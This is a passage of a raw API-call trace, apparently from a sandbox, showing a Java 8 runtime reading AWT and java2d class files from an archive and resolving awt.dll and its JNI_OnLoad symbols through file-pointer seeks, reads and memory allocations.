liDistanceToMove=0x30a3a5f, lpNewFilePointer=0x208c6f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c6f0*=51001951) returned 1 [0128.371] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x2a8, lpNumberOfBytesRead=0x208c6c0, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208c6c0*=0x2a8, lpOverlapped=0x0) returned 1 [0128.371] free (_Block=0x12e5fdd0) [0128.372] free (_Block=0x12e5f6a0) [0128.757] strlen (_Str="sun/awt/windows/WToolkit$1.class") returned 0x20 [0128.757] malloc (_Size=0x48) returned 0x12e5f0b0 [0128.757] malloc (_Size=0xa0) returned 0x12daace0 [0128.757] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34127e7, lpNewFilePointer=0x208d1a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d1a0*=54601703) returned 1 [0128.757] ReadFile (in: hFile=0x134, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d170, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x208d170*=0xa0, lpOverlapped=0x0) returned 1 [0128.757] malloc (_Size=0x21) returned 0x12ddb160 [0128.757] strlen (_Str="sun/awt/windows/WToolkit$1.class") returned 0x20 [0128.758] strcpy (in: _Dest=0x208d320, _Source="sun/awt/windows/WToolkit$1.class" | out: _Dest="sun/awt/windows/WToolkit$1.class") returned="sun/awt/windows/WToolkit$1.class" [0128.758] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fc846e, lpNewFilePointer=0x208cda0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cda0*=50103406) returned 1 [0128.758] ReadFile (in: hFile=0x134, lpBuffer=0x208cdf0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd70, lpOverlapped=0x0 | out: lpBuffer=0x208cdf0*, lpNumberOfBytesRead=0x208cd70*=0x1e, lpOverlapped=0x0) returned 1 [0128.758] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fc84ac, lpNewFilePointer=0x208ce00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ce00*=50103468) returned 1 [0128.758] ReadFile (in: hFile=0x134, lpBuffer=0x20fe990, nNumberOfBytesToRead=0x247, lpNumberOfBytesRead=0x208cdd0, lpOverlapped=0x0 | out: lpBuffer=0x20fe990*, lpNumberOfBytesRead=0x208cdd0*=0x247, lpOverlapped=0x0) returned 1 [0128.758] free (_Block=0x12dda9e0) [0128.758] free (_Block=0x12e5ed90) [0128.763] strlen (_Str="") returned 0x0 [0128.763] strlen (_Str=".dll") returned 0x4 [0128.763] strlen (_Str="") returned 0x0 [0128.763] strlen (_Str=".dll") returned 0x4 [0128.763] GetModuleHandleA (lpModuleName=0x0) returned 0x7ff7d5e70000 [0128.764] malloc (_Size=0x8) returned 0x121a5610 [0128.764] strlen (_Str="awt.dll") returned 0x7 [0128.764] malloc (_Size=0x8) returned 0x1322f3b0 [0128.764] strcpy (in: _Dest=0x1322f3b0, _Source="awt.dll" | out: _Dest="awt.dll") returned="awt.dll" [0128.764] free (_Block=0x121a5610) [0128.764] strlen (_Str="awt.dll") returned 0x7 [0128.764] strlen (_Str="awt") returned 0x3 [0128.764] strlen (_Str="_JNI_OnLoad@8") returned 0xd [0128.764] malloc (_Size=0x12) returned 0x12f4e1c0 [0128.764] strncpy (in: _Dest=0x12f4e1c0, _Source="_JNI_OnLoad@8", _Count=0xb | out: _Dest="_JNI_OnLoad") returned="_JNI_OnLoad" [0128.764] strcat (in: _Dest=0x12f4e1c0, _Source="_" | out: _Dest="_JNI_OnLoad_") returned="_JNI_OnLoad_" [0128.764] strcat (in: _Dest=0x12f4e1c0, _Source="awt" | out: _Dest="_JNI_OnLoad_awt") returned="_JNI_OnLoad_awt" [0128.764] strcat (in: _Dest=0x12f4e1c0, _Source="@8" | out: _Dest="_JNI_OnLoad_awt@8") returned="_JNI_OnLoad_awt@8" [0128.764] free (_Block=0x12f4e1c0) [0128.764] strlen (_Str="awt") returned 0x3 [0128.764] strlen (_Str="JNI_OnLoad") returned 0xa [0128.764] malloc (_Size=0xf) returned 0x12f4e2c0 [0128.764] strcpy (in: _Dest=0x12f4e2c0, _Source="JNI_OnLoad" | out: _Dest="JNI_OnLoad") returned="JNI_OnLoad" [0128.764] strcat (in: _Dest=0x12f4e2c0, _Source="_" | out: _Dest="JNI_OnLoad_") returned="JNI_OnLoad_" [0128.764] strcat (in: _Dest=0x12f4e2c0, _Source="awt" | out: _Dest="JNI_OnLoad_awt") returned="JNI_OnLoad_awt" [0128.764] free (_Block=0x12f4e2c0) [0128.764] free (_Block=0x1322f3b0) [0128.765] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\awt.dll") returned 0x2e [0128.765] malloc (_Size=0x68) returned 0x12ec3c40 [0128.765] wcscpy (in: _Dest=0x12ec3c40, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\awt.dll" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\awt.dll") returned="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\awt.dll" [0128.765] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\awt.dll", nBufferLength=0x9, lpBuffer=0x208c678, lpFilePart=0x208c670 | out: lpBuffer="", lpFilePart=0x208c670*=0x0) returned 0x2f [0128.765] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\awt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_171\\bin\\awt.dll"), fInfoLevelId=0x0, lpFileInformation=0x208c410 | out: lpFileInformation=0x208c410*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb165611, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb165611, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb165611, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x1725c8)) returned 1 [0128.765] free (_Block=0x12ec3c40) [0128.767] strlen (_Str="sun/java2d/SurfaceData.class") returned 0x1c [0128.767] malloc (_Size=0x48) returned 0x12e60140 [0128.767] malloc (_Size=0xa0) returned 0x12dabf70 [0128.767] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341279d, lpNewFilePointer=0x208d800, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d800*=54601629) returned 1 [0128.767] ReadFile (in: hFile=0x134, lpBuffer=0x12dabf70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d7d0, lpOverlapped=0x0 | out: lpBuffer=0x12dabf70*, lpNumberOfBytesRead=0x208d7d0*=0xa0, lpOverlapped=0x0) returned 1 [0128.767] malloc (_Size=0x1d) returned 0x12ddac20 [0128.768] strlen (_Str="sun/java2d/SurfaceData.class") returned 0x1c [0128.768] strcpy (in: _Dest=0x208d980, _Source="sun/java2d/SurfaceData.class" | out: _Dest="sun/java2d/SurfaceData.class") returned="sun/java2d/SurfaceData.class" [0128.768] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fc451c, lpNewFilePointer=0x208d400, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d400*=50087196) returned 1 [0128.768] ReadFile (in: hFile=0x134, lpBuffer=0x208d450, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d3d0, lpOverlapped=0x0 | out: lpBuffer=0x208d450*, lpNumberOfBytesRead=0x208d3d0*=0x1e, lpOverlapped=0x0) returned 1 [0128.768] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fc4556, lpNewFilePointer=0x208d460, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d460*=50087254) returned 1 [0128.768] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x3f18, lpNumberOfBytesRead=0x208d430, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208d430*=0x3f18, lpOverlapped=0x0) returned 1 [0128.769] free (_Block=0x12ddb160) [0128.770] free (_Block=0x12e5f0b0) [0128.773] strlen (_Str="java/awt/Transparency.class") returned 0x1b [0128.773] malloc (_Size=0x48) returned 0x12e600f0 [0128.773] malloc (_Size=0xa0) returned 0x12dab940 [0128.773] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3412754, lpNewFilePointer=0x208cd40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd40*=54601556) returned 1 [0128.773] ReadFile (in: hFile=0x134, lpBuffer=0x12dab940, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cd10, lpOverlapped=0x0 | out: lpBuffer=0x12dab940*, lpNumberOfBytesRead=0x208cd10*=0xa0, lpOverlapped=0x0) returned 1 [0128.773] malloc (_Size=0x1c) returned 0x12dda650 [0128.774] strlen (_Str="java/awt/Transparency.class") returned 0x1b [0128.774] strcpy (in: _Dest=0x208cec0, _Source="java/awt/Transparency.class" | out: _Dest="java/awt/Transparency.class") returned="java/awt/Transparency.class" [0128.774] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fc4406, lpNewFilePointer=0x208c940, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c940*=50086918) returned 1 [0128.774] ReadFile (in: hFile=0x134, lpBuffer=0x208c990, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c910, lpOverlapped=0x0 | out: lpBuffer=0x208c990*, lpNumberOfBytesRead=0x208c910*=0x1e, lpOverlapped=0x0) returned 1 [0128.774] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fc443f, lpNewFilePointer=0x208c9a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c9a0*=50086975) returned 1 [0128.774] ReadFile (in: hFile=0x134, lpBuffer=0x1227e520, nNumberOfBytesToRead=0xdd, lpNumberOfBytesRead=0x208c970, lpOverlapped=0x0 | out: lpBuffer=0x1227e520*, lpNumberOfBytesRead=0x208c970*=0xdd, lpOverlapped=0x0) returned 1 [0128.774] free (_Block=0x12ddac20) [0128.775] free (_Block=0x12e60140) [0128.777] strlen (_Str="sun/java2d/DisposerTarget.class") returned 0x1f [0128.777] malloc (_Size=0x48) returned 0x12e5ee80 [0128.777] malloc (_Size=0xa0) returned 0x12dab520 [0128.777] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3412707, lpNewFilePointer=0x208cd40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd40*=54601479) returned 1 [0128.777] ReadFile (in: hFile=0x134, lpBuffer=0x12dab520, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cd10, lpOverlapped=0x0 | out: lpBuffer=0x12dab520*, lpNumberOfBytesRead=0x208cd10*=0xa0, lpOverlapped=0x0) returned 1 [0128.777] malloc (_Size=0x20) returned 0x12ddaa10 [0128.777] strlen (_Str="sun/java2d/DisposerTarget.class") returned 0x1f [0128.778] strcpy (in: _Dest=0x208cec0, _Source="sun/java2d/DisposerTarget.class" | out: _Dest="sun/java2d/DisposerTarget.class") returned="sun/java2d/DisposerTarget.class" [0128.778] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fc4347, lpNewFilePointer=0x208c940, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c940*=50086727) returned 1 [0128.778] ReadFile (in: hFile=0x134, lpBuffer=0x208c990, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c910, lpOverlapped=0x0 | out: lpBuffer=0x208c990*, lpNumberOfBytesRead=0x208c910*=0x1e, lpOverlapped=0x0) returned 1 [0128.778] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fc4384, lpNewFilePointer=0x208c9a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c9a0*=50086788) returned 1 [0128.778] ReadFile (in: hFile=0x134, lpBuffer=0x1227e520, nNumberOfBytesToRead=0x82, lpNumberOfBytesRead=0x208c970, lpOverlapped=0x0 | out: lpBuffer=0x1227e520*, lpNumberOfBytesRead=0x208c970*=0x82, lpOverlapped=0x0) returned 1 [0128.778] free (_Block=0x12dda650) [0128.778] free (_Block=0x12e600f0) [0128.780] strlen (_Str="sun/java2d/StateTrackable.class") returned 0x1f [0128.780] malloc (_Size=0x48) returned 0x12e5ffb0 [0128.780] malloc (_Size=0xa0) returned 0x12dabe10 [0128.780] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34126ba, lpNewFilePointer=0x208cd40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd40*=54601402) returned 1 [0128.780] ReadFile (in: hFile=0x134, lpBuffer=0x12dabe10, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cd10, lpOverlapped=0x0 | out: lpBuffer=0x12dabe10*, lpNumberOfBytesRead=0x208cd10*=0xa0, lpOverlapped=0x0) returned 1 [0128.780] malloc (_Size=0x20) returned 0x12ddab30 [0128.781] strlen (_Str="sun/java2d/StateTrackable.class") returned 0x1f [0128.781] strcpy (in: _Dest=0x208cec0, _Source="sun/java2d/StateTrackable.class" | out: _Dest="sun/java2d/StateTrackable.class") returned="sun/java2d/StateTrackable.class" [0128.781] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fc4200, lpNewFilePointer=0x208c940, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c940*=50086400) returned 1 [0128.781] ReadFile (in: hFile=0x134, lpBuffer=0x208c990, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c910, lpOverlapped=0x0 | out: lpBuffer=0x208c990*, lpNumberOfBytesRead=0x208c910*=0x1e, lpOverlapped=0x0) returned 1 [0128.781] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fc423d, lpNewFilePointer=0x208c9a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c9a0*=50086461) returned 1 [0128.781] ReadFile (in: hFile=0x134, lpBuffer=0x1227e520, nNumberOfBytesToRead=0x10a, lpNumberOfBytesRead=0x208c970, lpOverlapped=0x0 | out: lpBuffer=0x1227e520*, lpNumberOfBytesRead=0x208c970*=0x10a, lpOverlapped=0x0) returned 1 [0128.782] free (_Block=0x12ddaa10) [0128.782] free (_Block=0x12e5ee80) [0128.785] strlen (_Str="sun/java2d/Surface.class") returned 0x18 [0128.785] malloc (_Size=0x48) returned 0x12e5f1f0 [0128.785] malloc (_Size=0xa0) returned 0x12dab520 [0128.785] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3412674, lpNewFilePointer=0x208cd40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd40*=54601332) returned 1 [0128.785] ReadFile (in: hFile=0x134, lpBuffer=0x12dab520, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cd10, lpOverlapped=0x0 | out: lpBuffer=0x12dab520*, lpNumberOfBytesRead=0x208cd10*=0xa0, lpOverlapped=0x0) returned 1 [0128.785] malloc (_Size=0x19) returned 0x12ddabf0 [0128.786] strlen (_Str="sun/java2d/Surface.class") returned 0x18 [0128.786] strcpy (in: _Dest=0x208cec0, _Source="sun/java2d/Surface.class" | out: _Dest="sun/java2d/Surface.class") returned="sun/java2d/Surface.class" [0128.786] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fc4184, lpNewFilePointer=0x208c940, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c940*=50086276) returned 1 [0128.786] ReadFile (in: hFile=0x134, lpBuffer=0x208c990, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c910, lpOverlapped=0x0 | out: lpBuffer=0x208c990*, lpNumberOfBytesRead=0x208c910*=0x1e, lpOverlapped=0x0) returned 1 [0128.786] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fc41ba, lpNewFilePointer=0x208c9a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c9a0*=50086330) returned 1 [0128.786] ReadFile (in: hFile=0x134, lpBuffer=0x1227e520, nNumberOfBytesToRead=0x46, lpNumberOfBytesRead=0x208c970, lpOverlapped=0x0 | out: lpBuffer=0x1227e520*, lpNumberOfBytesRead=0x208c970*=0x46, lpOverlapped=0x0) returned 1 [0128.787] free (_Block=0x12ddab30) [0128.787] free (_Block=0x12e5ffb0) [0128.804] malloc (_Size=0x48) returned 0x12e5ede0 [0128.804] malloc (_Size=0xa0) returned 0x12daace0 [0128.804] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3412621, lpNewFilePointer=0x208d0d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d0d0*=54601249) returned 1 [0128.804] ReadFile (in: hFile=0x134, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d0a0, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x208d0a0*=0xa0, lpOverlapped=0x0) returned 1 [0128.804] malloc (_Size=0x26) returned 0x12ddb0a0 [0128.804] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fc405e, lpNewFilePointer=0x208ccd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ccd0*=50085982) returned 1 [0128.805] ReadFile (in: hFile=0x134, lpBuffer=0x208cd20, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cca0, lpOverlapped=0x0 | out: lpBuffer=0x208cd20*, lpNumberOfBytesRead=0x208cca0*=0x1e, lpOverlapped=0x0) returned 1 [0128.805] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fc40a1, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=50086049) returned 1 [0128.805] ReadFile (in: hFile=0x134, lpBuffer=0x20fe990, nNumberOfBytesToRead=0xe3, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x20fe990*, lpNumberOfBytesRead=0x208cd00*=0xe3, lpOverlapped=0x0) returned 1 [0128.806] malloc (_Size=0x48) returned 0x12e5f830 [0128.806] malloc (_Size=0xa0) returned 0x12dac860 [0128.806] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3412580, lpNewFilePointer=0x208d0d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d0d0*=54601088) returned 1 [0128.806] ReadFile (in: hFile=0x134, lpBuffer=0x12dac860, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d0a0, lpOverlapped=0x0 | out: lpBuffer=0x12dac860*, lpNumberOfBytesRead=0x208d0a0*=0xa0, lpOverlapped=0x0) returned 1 [0128.806] malloc (_Size=0x21) returned 0x12ddabf0 [0128.806] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fc363b, lpNewFilePointer=0x208ccd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ccd0*=50083387) returned 1 [0128.807] ReadFile (in: hFile=0x134, lpBuffer=0x208cd20, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cca0, lpOverlapped=0x0 | out: lpBuffer=0x208cd20*, lpNumberOfBytesRead=0x208cca0*=0x1e, lpOverlapped=0x0) returned 1 [0128.807] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fc3679, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=50083449) returned 1 [0128.807] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x7e7, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208cd00*=0x7e7, lpOverlapped=0x0) returned 1 [0128.808] malloc (_Size=0x48) returned 0x12e5fd80 [0128.808] malloc (_Size=0xa0) returned 0x12daace0 [0128.808] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341252d, lpNewFilePointer=0x208c1d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c1d0*=54601005) returned 1 [0128.808] ReadFile (in: hFile=0x134, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c1a0, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x208c1a0*=0xa0, lpOverlapped=0x0) returned 1 [0128.808] malloc (_Size=0x26) returned 0x12ddb190 [0128.808] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fc3229, lpNewFilePointer=0x208bdd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bdd0*=50082345) returned 1 [0128.808] ReadFile (in: hFile=0x134, lpBuffer=0x208be20, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bda0, lpOverlapped=0x0 | out: lpBuffer=0x208be20*, lpNumberOfBytesRead=0x208bda0*=0x1e, lpOverlapped=0x0) returned 1 [0128.808] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fc326c, lpNewFilePointer=0x208be30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208be30*=50082412) returned 1 [0128.808] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x3cf, lpNumberOfBytesRead=0x208be00, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208be00*=0x3cf, lpOverlapped=0x0) returned 1 [0128.809] malloc (_Size=0x48) returned 0x12e5fce0 [0128.809] malloc (_Size=0xa0) returned 0x12dab520 [0128.809] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34124dd, lpNewFilePointer=0x208c1d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c1d0*=54600925) returned 1 [0128.809] ReadFile (in: hFile=0x134, lpBuffer=0x12dab520, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c1a0, lpOverlapped=0x0 | out: lpBuffer=0x12dab520*, lpNumberOfBytesRead=0x208c1a0*=0xa0, lpOverlapped=0x0) returned 1 [0128.809] malloc (_Size=0x23) returned 0x12ddaef0 [0128.810] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fc126e, lpNewFilePointer=0x208bdd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bdd0*=50074222) returned 1 [0128.810] ReadFile (in: hFile=0x134, lpBuffer=0x208be20, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bda0, lpOverlapped=0x0 | out: lpBuffer=0x208be20*, lpNumberOfBytesRead=0x208bda0*=0x1e, lpOverlapped=0x0) returned 1 [0128.811] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fc12ae, lpNewFilePointer=0x208be30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208be30*=50074286) returned 1 [0128.811] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x1f7b, lpNumberOfBytesRead=0x208be00, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208be00*=0x1f7b, lpOverlapped=0x0) returned 1 [0128.813] malloc (_Size=0x48) returned 0x12e5f560 [0128.814] malloc (_Size=0xa0) returned 0x12dac390 [0128.814] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341248d, lpNewFilePointer=0x208b890, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b890*=54600845) returned 1 [0128.814] ReadFile (in: hFile=0x134, lpBuffer=0x12dac390, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b860, lpOverlapped=0x0 | out: lpBuffer=0x12dac390*, lpNumberOfBytesRead=0x208b860*=0xa0, lpOverlapped=0x0) returned 1 [0128.814] malloc (_Size=0x23) returned 0x12dda740 [0128.814] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fc0af8, lpNewFilePointer=0x208b490, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b490*=50072312) returned 1 [0128.814] ReadFile (in: hFile=0x134, lpBuffer=0x208b4e0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b460, lpOverlapped=0x0 | out: lpBuffer=0x208b4e0*, lpNumberOfBytesRead=0x208b460*=0x1e, lpOverlapped=0x0) returned 1 [0128.815] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fc0b38, lpNewFilePointer=0x208b4f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b4f0*=50072376) returned 1 [0128.815] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x736, lpNumberOfBytesRead=0x208b4c0, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208b4c0*=0x736, lpOverlapped=0x0) returned 1 [0128.818] malloc (_Size=0x48) returned 0x12e5ed90 [0128.818] malloc (_Size=0xa0) returned 0x12dab940 [0128.818] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3412438, lpNewFilePointer=0x208b8a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b8a0*=54600760) returned 1 [0128.818] ReadFile (in: hFile=0x134, lpBuffer=0x12dab940, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b870, lpOverlapped=0x0 | out: lpBuffer=0x12dab940*, lpNumberOfBytesRead=0x208b870*=0xa0, lpOverlapped=0x0) returned 1 [0128.818] malloc (_Size=0x28) returned 0x12ddafb0 [0128.818] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fc08fe, lpNewFilePointer=0x208b4a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b4a0*=50071806) returned 1 [0128.818] ReadFile (in: hFile=0x134, lpBuffer=0x208b4f0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b470, lpOverlapped=0x0 | out: lpBuffer=0x208b4f0*, lpNumberOfBytesRead=0x208b470*=0x1e, lpOverlapped=0x0) returned 1 [0128.818] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fc0943, lpNewFilePointer=0x208b500, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b500*=50071875) returned 1 [0128.818] ReadFile (in: hFile=0x134, lpBuffer=0x20fe9b0, nNumberOfBytesToRead=0x1b5, lpNumberOfBytesRead=0x208b4d0, lpOverlapped=0x0 | out: lpBuffer=0x20fe9b0*, lpNumberOfBytesRead=0x208b4d0*=0x1b5, lpOverlapped=0x0) returned 1 [0128.819] malloc (_Size=0x48) returned 0x12e5fb00 [0128.820] malloc (_Size=0xa0) returned 0x12daaef0 [0128.820] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34123e3, lpNewFilePointer=0x208b8a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b8a0*=54600675) returned 1 [0128.820] ReadFile (in: hFile=0x134, lpBuffer=0x12daaef0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b870, lpOverlapped=0x0 | out: lpBuffer=0x12daaef0*, lpNumberOfBytesRead=0x208b870*=0xa0, lpOverlapped=0x0) returned 1 [0128.820] malloc (_Size=0x28) returned 0x12dda650 [0128.820] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fc06e7, lpNewFilePointer=0x208b4a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b4a0*=50071271) returned 1 [0128.820] ReadFile (in: hFile=0x134, lpBuffer=0x208b4f0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b470, lpOverlapped=0x0 | out: lpBuffer=0x208b4f0*, lpNumberOfBytesRead=0x208b470*=0x1e, lpOverlapped=0x0) returned 1 [0128.820] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fc072c, lpNewFilePointer=0x208b500, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b500*=50071340) returned 1 [0128.821] ReadFile (in: hFile=0x134, lpBuffer=0x20fe9b0, nNumberOfBytesToRead=0x1d2, lpNumberOfBytesRead=0x208b4d0, lpOverlapped=0x0 | out: lpBuffer=0x20fe9b0*, lpNumberOfBytesRead=0x208b4d0*=0x1d2, lpOverlapped=0x0) returned 1 [0128.822] malloc (_Size=0x48) returned 0x12e5f1a0 [0128.822] malloc (_Size=0xa0) returned 0x12dab890 [0128.822] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341238b, lpNewFilePointer=0x208b8a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b8a0*=54600587) returned 1 [0128.822] ReadFile (in: hFile=0x134, lpBuffer=0x12dab890, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b870, lpOverlapped=0x0 | out: lpBuffer=0x12dab890*, lpNumberOfBytesRead=0x208b870*=0xa0, lpOverlapped=0x0) returned 1 [0128.822] malloc (_Size=0x2b) returned 0x12ef4cd0 [0128.823] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fc03dc, lpNewFilePointer=0x208b4a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b4a0*=50070492) returned 1 [0128.823] ReadFile (in: hFile=0x134, lpBuffer=0x208b4f0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b470, lpOverlapped=0x0 | out: lpBuffer=0x208b4f0*, lpNumberOfBytesRead=0x208b470*=0x1e, lpOverlapped=0x0) returned 1 [0128.823] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fc0424, lpNewFilePointer=0x208b500, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b500*=50070564) returned 1 [0128.823] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x2c3, lpNumberOfBytesRead=0x208b4d0, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, 